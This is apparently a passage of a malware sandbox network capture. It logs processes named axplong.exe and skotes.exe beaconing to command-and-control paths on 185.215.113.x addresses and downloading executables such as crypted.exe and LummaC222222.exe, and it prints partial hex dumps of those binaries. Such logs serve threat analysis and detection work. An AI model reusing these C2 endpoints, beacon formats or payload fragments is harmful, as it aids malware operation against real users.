                                                      Data Raw: 64 31 3d 31 30 30 30 32 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000287001&unit=246122658369
                                                      Sep 24, 2024 15:37:11.449831963 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:11 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      124192.168.2.749894185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:11.463566065 CEST56OUTGET /inc/crypted.exe HTTP/1.1
                                                      Host: 185.215.113.117
                                                      Sep 24, 2024 15:37:12.153140068 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:12 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 321536
                                                      Last-Modified: Mon, 16 Sep 2024 13:46:13 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e836a5-4e800"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL&f @ @`W | H.text `.rsrc@@.reloc @BHh7c73wV)J.:aW'=|Q&pIIoOgQP~CMv@P*Sla=:u?ED"Jp2rBH?v0]2>F}s6N.h#Z6g^guaW&2n?v*S}!^Ehdpfc4{/OIvQ,U>xKcD/E7.TtyfSC)Fm"2Ms3"KLezcBb-l\TYQB!?e]4/(554'[g
                                                      Sep 24, 2024 15:37:12.153148890 CEST1236INData Raw: 24 0a b7 15 e6 e6 67 62 3b 65 aa ea 51 d3 e0 72 e5 85 91 47 65 28 61 3c c6 e3 9a 71 43 8c 4a d6 1e 77 03 81 ea 51 99 dc 19 df 94 c3 12 af 4a 2c 8a d2 c2 fb 79 62 77 d3 2e 49 7d 94 40 dd 1c 85 7b 6f d0 74 97 aa 82 15 82 74 3e dc 96 82 76 9f bc 4b
                                                      Data Ascii: $gb;eQrGe(a<qCJwQJ,ybw.I}@{ott>vK@)X8R@["kQR[l*SvtSys)jK,z%8Ql]T8zGc]V3E'=Ss2^aq>pBI#t0= !ur;G\v?kLa-U
                                                      Sep 24, 2024 15:37:12.153162003 CEST1236INData Raw: e0 0d 4b c5 22 19 ad 7c af 12 cc 22 0d 91 1f ed 91 eb 12 c9 43 26 10 79 f5 1b 4a e1 53 6a a4 9d 5f 70 bf a7 8c 40 c0 f8 3a b0 e5 48 e0 67 b8 73 38 c2 d2 20 d2 c3 7e 8b 9c 28 c4 8c 31 c4 54 16 a7 47 4d 2b 9b b2 61 47 fa f6 ba e4 1e 18 67 00 6b a1
                                                      Data Ascii: K"|"C&yJSj_p@:Hgs8 ~(1TGM+aGgk5J5&@9Q"Nm.InA<"1]pNG|<<!/vh=c;MVx&M6&)~2g75`L8.d#NGPy
                                                      Sep 24, 2024 15:37:12.153168917 CEST372INData Raw: 63 4e 1a 75 8a ee e7 70 75 8f 79 e3 f1 89 ab b3 a7 5b e4 99 c8 f4 ff 8a 2f f7 bc f2 43 76 06 8a e4 b4 c6 ab cb 41 2d 56 3f 22 b9 21 72 a6 23 92 8e 0d 02 c7 db 8f 94 97 71 97 87 5a eb fa 33 b6 e4 77 27 bb 73 4a db c9 ee 5f a0 2d d0 fe 9d 9c 4b d6
                                                      Data Ascii: cNupuy[/CvA-V?"!r#qZ3w'sJ_-K9J74;`]1<+qL`5hKCRcA(h6)NGf4JKP"@jW4X.("9uOLD(Xqn#ma89
                                                      Sep 24, 2024 15:37:12.153276920 CEST1236INData Raw: 6a 07 db 53 21 4d 15 f6 aa 1e 43 ec d4 10 ef aa ee d0 d3 64 31 bf b9 c8 59 68 34 0b 33 a5 7a db a6 f9 bb 31 2b 60 99 0e 5b c6 52 94 26 73 44 d4 53 89 32 fb 72 be b7 76 b8 f7 18 09 10 49 e6 c9 fa 1a c3 07 df dd 76 7f 9d 2d 5a 47 0b 50 21 ef e0 aa
                                                      Data Ascii: jS!MCd1Yh43z1+`[R&sDS2rvIv-ZGP!oV&B8akUi&*g;M%4m4{Xn]_ERlK8^y\-USnL&Og\Bqh%Xu`8
                                                      Sep 24, 2024 15:37:12.153296947 CEST1236INData Raw: f5 66 b3 c5 ef c3 90 1a ac ec 1f 4a fb 3b 36 35 8d 52 4b 24 17 c6 d1 58 fb f9 39 bf bb 60 12 f9 40 c3 ad e1 77 44 9e ca f0 90 ea ce a6 0d b5 0b 39 e3 3f df 7c 4b 63 20 e6 df c7 3d 55 29 57 0b fc ea 81 20 c4 88 86 a0 99 68 38 8c 40 2e da 4e 4f 17
                                                      Data Ascii: fJ;65RK$X9`@wD9?|Kc =U)W h8@.NOLH#,FVh?KN~uPy%?XP{.dh3Lb;g{)/fB_=n+h:Mru4g}_6ZS<RRdY_g@.nv5{nNM"Q
                                                      Sep 24, 2024 15:37:12.153305054 CEST1236INData Raw: 76 e4 68 33 91 9a 86 c8 fe 33 7a f4 31 93 e5 b3 72 27 4c 96 29 73 98 61 a9 77 18 33 10 c8 b3 aa cc c0 6d 25 83 b1 71 79 92 a8 59 9f 81 47 d1 5c 75 0c 86 80 69 65 b3 89 70 4b 29 a6 de 9a f9 aa 10 95 e7 6e fa 4f d4 73 c9 78 aa 80 13 58 55 3d 07 bd
                                                      Data Ascii: vh33z1r'L)saw3m%qyYG\uiepK)nOsxXU=Wq8%~>_rmlD'm_bLw{j1D4b{B4d B`5m5UN6zeA"yPDj)Nk_fsq3y{H8TFF>!6"UTSnJaOwld5qy+
                                                      Sep 24, 2024 15:37:12.153573036 CEST1236INData Raw: 78 b3 39 90 7e 16 b8 13 f6 92 2d 41 00 0f 98 a6 ac 08 b1 f1 ce f9 13 2d 8f ea 21 47 73 c5 ca 28 34 3b 1b 00 64 ff 9a 7b 5b 38 37 69 04 60 e0 8b a9 79 0a ed 71 27 b1 87 be 65 a4 cb 2f 4b 6f b3 27 cb 63 d1 1e b3 6d 60 ed bc 40 05 43 c0 33 64 73 62
                                                      Data Ascii: x9~-A-!Gs(4;d{[87i`yq'e/Ko'cm`@C3dsbedWNMZNWb#hSFGqQ9&x7aZs~Hf@C4]=D\U{{Mv2@d-V#-4q4>x+Ii7M36H~V.E
                                                      Sep 24, 2024 15:37:12.153585911 CEST1236INData Raw: ac 75 c5 12 75 e9 04 15 58 83 53 31 31 d8 2e 1c 1c 2c d4 d9 2b b4 11 16 78 05 5e 82 73 2a 32 6b 60 99 35 c9 37 98 5b 7f 77 86 cf b3 92 c5 bc 36 8d 5b fd 2b a3 51 a4 21 ac 92 b1 95 27 7c 78 af f2 8f 7e 30 62 39 50 c9 0a 36 ec 82 94 76 03 d4 e1 60
                                                      Data Ascii: uuXS11.,+x^s*2k`57[w6[+Q!'|x~0b9P6v`A6n.zN-[]Tl Qx7z~:&Lb&ac<;DD6qFN'Lu.!fyF:$9?OBkn-|6nZDaR'qipF$2(&v!B
                                                      Sep 24, 2024 15:37:12.153723955 CEST1236INData Raw: f2 a8 0c 68 5a 96 1c d7 4e 92 e8 d8 b1 63 80 03 bc 61 96 53 2b f6 2b 21 ba ec 7a 7d 52 92 1e ce 78 8e 33 cf ac af 2c 94 18 c2 f5 2d 54 6c 39 8f 2b 0f 86 8a b3 42 48 7e 53 6c 69 d0 88 8e 6d ba 4e d8 f1 82 ee 09 e1 cf 31 46 26 c2 76 34 4e 64 03 5e
                                                      Data Ascii: hZNcaS++!z}Rx3,-Tl9+BH~SlimN1F&v4Nd^T[%':-m[`1 Q):}U?8qe!<8H3]rW@o5gqwN&yT&ISt+5v0$[lOE"b IGP0q8N
                                                      Sep 24, 2024 15:37:12.158334970 CEST776INData Raw: b7 00 ea 6a ce 73 7a 49 45 01 ef 10 aa 59 1e 04 0e bd 9b 85 87 19 1a 1e 66 35 2c f6 68 87 4d 99 c3 a1 e9 80 03 a5 0a 75 a8 2f d1 12 9f 20 b0 97 22 a5 9b b1 55 85 14 51 93 2e 13 1c c0 ae dd 5f e3 e9 99 f1 7f 1f a7 59 da 97 44 5c ca 5c 08 46 67 7e
                                                      Data Ascii: jszIEYf5,hMu/ "UQ._YD\\Fg~Q(R8QrhOn2]{{@Q2WP+lU_3L,Kz#(YKoYR>/#9gyP&th$z4S]-/m


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      125192.168.2.749896185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:12.997797012 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:13.687092066 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:13 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      126192.168.2.749897185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:13.715029955 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000290001&unit=246122658369
                                                      Sep 24, 2024 15:37:14.453464985 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:14 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      127192.168.2.749899185.215.113.100807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:14.469110966 CEST57OUTGET /steam/random.exe HTTP/1.1
                                                      Host: 185.215.113.100
                                                      Sep 24, 2024 15:37:15.169512987 CEST1236INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:37:15 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Last-Modified: Tue, 24 Sep 2024 12:56:26 GMT
                                                      ETag: "1c0200-622dd088a9fca"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 1835520
                                                      Content-Type: application/x-msdos-program
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CXmYpy`\nRichPEL/f$pi@i6D@P%d% %(@.rsrc %8@.idata %8@ )%:@fcorzhaoO<@ykxfeacd`i@.taggant0pi"@
                                                      Sep 24, 2024 15:37:15.169558048 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:37:15.169606924 CEST448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:37:15.169625044 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:37:15.169641972 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: [m~~]?OT}@Ks0OAP.A
                                                      Sep 24, 2024 15:37:15.169660091 CEST1236INData Raw: 46 d0 17 34 65 ad 41 3a 57 16 79 1f 5a 84 a2 83 ff 20 82 c7 73 0a 4f 4b 92 d3 8e 84 1e 0a 43 59 b4 54 8f 84 a1 4f e8 54 b0 6d ed 5a 42 59 e7 a1 48 ca 42 a0 5b 7d a8 4d 48 59 0c ad 6b 62 d2 b9 11 55 b7 84 63 40 40 17 7a 5a 15 ba 97 e5 3b 2b 94 7d
                                                      Data Ascii: F4eA:WyZ sOKCYTOTmZBYHB[}MHYkbUc@@zZ;+}S6O)mZ2lvbBAYOy:PhWr_]BF\J\VDZOjhX.3+9'IGOjq-A8NGqaGrb??\[T"y6TCZ?YB4-ygV\xB
                                                      Sep 24, 2024 15:37:15.169699907 CEST1236INData Raw: e4 56 81 b9 1f ac ff dc 15 2a cf b3 f5 45 49 19 32 45 99 27 05 2c ba 8a 96 35 72 8a b2 34 df da f3 dd 5f 58 e2 4b df ab 0c fb 9c 19 4c c6 d5 49 f9 46 c3 04 65 fd 09 1b fc d9 26 8b 32 10 86 b8 7c 24 dd 8f 53 55 8f bf 2c 01 01 a1 4b 52 bf 99 79 f6
                                                      Data Ascii: V*EI2E',5r4_XKLIFe&2|$SU,KRyHAjsKKB@HpqF~oK)UtZDjer1eZcyyTCXNwX)X],(gbDgP`R_kB c.k"R!\7A/
                                                      Sep 24, 2024 15:37:15.169720888 CEST1236INData Raw: 12 12 4d 4a 6a 2a a7 15 63 74 4b b9 49 f7 71 03 19 9d 57 9c fe c9 81 a3 e7 08 49 d4 60 46 0b 1c 1b 94 53 3a f6 7b 17 ba 3e 45 f7 b3 9e 06 5b ad 1d 4a a5 76 c0 89 1c 3e 63 08 17 bb 62 46 a3 1d d4 ab cf 39 7c f8 cf 2f 63 55 83 84 ff 88 1f 34 50 2a
                                                      Data Ascii: MJj*ctKIqWI`FS:{>E[Jv>cbF9|/cU4P*"G7W3ME^d\#|GL^MC\e,_M6OIY]dzuc~C]_'8xc*AkoUtF{JYk7.;.FdJ%LmN5.r
                                                      Sep 24, 2024 15:37:15.169737101 CEST552INData Raw: bb bd 5e 8a 14 75 4f ae 13 98 a2 53 7b 5d 6b 3a 58 31 cf 19 63 5e a1 b4 43 82 c6 05 b6 55 47 bc 56 4e 71 00 9b 5c af 9d 42 ca a0 e6 1d 5a d3 42 92 75 83 5d 68 98 56 b3 d2 6f f3 bc 5a 5d 81 71 69 f1 54 68 df 35 05 05 63 c6 47 38 36 8d a5 0f 48 36
                                                      Data Ascii: ^uOS{]k:X1c^CUGVNq\BZBu]hVoZ]qiTh5cG86H6cC]_?x}'cLB^Hvx{\u~8kiFnCJN'?TcC].ma^_w*#oDNsE\U>=`C]10|ZzYeV;+Iha
                                                      Sep 24, 2024 15:37:15.169759035 CEST1236INData Raw: 5c 5e 2e a3 bb 5c 51 14 de f0 a7 34 63 7a c7 4d 9c 67 5b 34 e5 89 ba b9 12 5d bc f8 a7 9d fe 45 e9 5c 13 ba 74 7d b7 6f 5e 6e 77 b3 48 ce 7b 06 a1 d5 b1 e5 e3 c9 d6 21 6b ba c6 8d 66 d2 6b 7f ca 4d d6 c5 57 93 71 5c 2e 29 62 f4 13 5d eb 58 c8 3b
                                                      Data Ascii: \^.\Q4czMg[4]E\t}o^nwH{!kfkMWq\.)b]X;C@<i9WWwn3]tjKZ]Q_Y1wcXC&d.kpUbzAW4n#AHj`x*MWqHM9cUZu[azbUvW"xk'QR7
                                                      Sep 24, 2024 15:37:15.176527977 CEST1236INData Raw: 6a 34 92 2c 70 ee 89 82 1a 06 95 2b 02 5f d0 de 54 ba 3a 9c 9d 18 b4 21 5b d7 1f ea 4e d5 22 85 07 ea 23 a5 3f 58 94 a9 d7 0d 97 64 4d 46 96 47 f1 32 44 88 a0 d8 e1 9c 0a ba cc d7 60 83 29 80 86 93 8e 99 07 8d 40 2d 79 84 f4 eb 42 40 cb ad 45 46
                                                      Data Ascii: j4,p+_T:![N"#?XdMFG2D`)@-yB@EF5M:(IZqBSQGkfC5+udtU7(#.'q[tDx8GLO<t*~?Mb;Ymb^,U4:wJG,B0HemkGY6r


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      128192.168.2.749900185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:15.325766087 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:37:16.022696972 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:15 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      129192.168.2.749901185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:17.554004908 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:37:18.259406090 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      130192.168.2.749902185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:17.658371925 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 33 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000308001&unit=246122658369
                                                      Sep 24, 2024 15:37:18.351682901 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      131192.168.2.749903185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:37:18.365520954 CEST61OUTGET /inc/LummaC222222.exe HTTP/1.1
                                                      Host: 185.215.113.117
                                                      Sep 24, 2024 15:37:19.102467060 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:37:18 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 360448
                                                      Last-Modified: Mon, 23 Sep 2024 14:42:37 GMT
                                                      Connection: keep-alive
                                                      ETag: "66f17e5d-58000"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 [TRUNCATED]
                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<f@@@xH.text `.rdata)*@@.dataX^@.relocHJ6@B
                                                      Sep 24, 2024 15:37:19.102482080 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 e4 f8 81 ec 68 02 00 00 8b 45 18 89 44 24 28 8b 45 14 8b 7d
                                                      Data Ascii: USWVhED$(E}D$LG@t$,tud)0Cu(!u
                                                      Sep 24, 2024 15:37:19.102488041 CEST1236INData Raw: 00 c0 44 00 c6 44 24 44 00 f6 c3 08 74 16 80 fa 42 0f 95 c0 66 c7 44 24 44 02 30 c0 e0 05 0c 42 88 44 24 46 c7 44 24 24 80 01 00 00 b9 01 00 00 00 f6 c3 20 0f 84 71 02 00 00 8b 44 24 28 8b 10 89 54 24 08 8b 50 04 83 c0 08 89 44 24 28 e9 6b 02 00
                                                      Data Ascii: DD$DtBfD$D0BD$FD$$ qD$(T$PD$(k\$DGtDD$ D$(L$tF\$L$XL$L$|$D$L$0T$<<#tL$D$$9rD$mT$
                                                      Sep 24, 2024 15:37:19.102494001 CEST1236INData Raw: ff ff e9 5f fb ff ff 8b 44 24 28 8b 00 c7 44 24 04 d8 e2 44 00 85 c0 74 04 89 44 24 04 8b 44 24 14 89 c1 85 c0 79 05 b9 ff ff ff ff 8b 44 24 04 a8 03 89 5c 24 1c 0f 84 de 11 00 00 89 4c 24 08 01 c1 89 4c 24 0c 83 7c 24 14 00 0f 84 b3 0e 00 00 80
                                                      Data Ascii: _D$(D$DtD$D$yD$\$L$L$|$8APD$Hitw9D$PL$AT$tOT$:"D$PAT$Wt'T$:D$:tD$\$D$
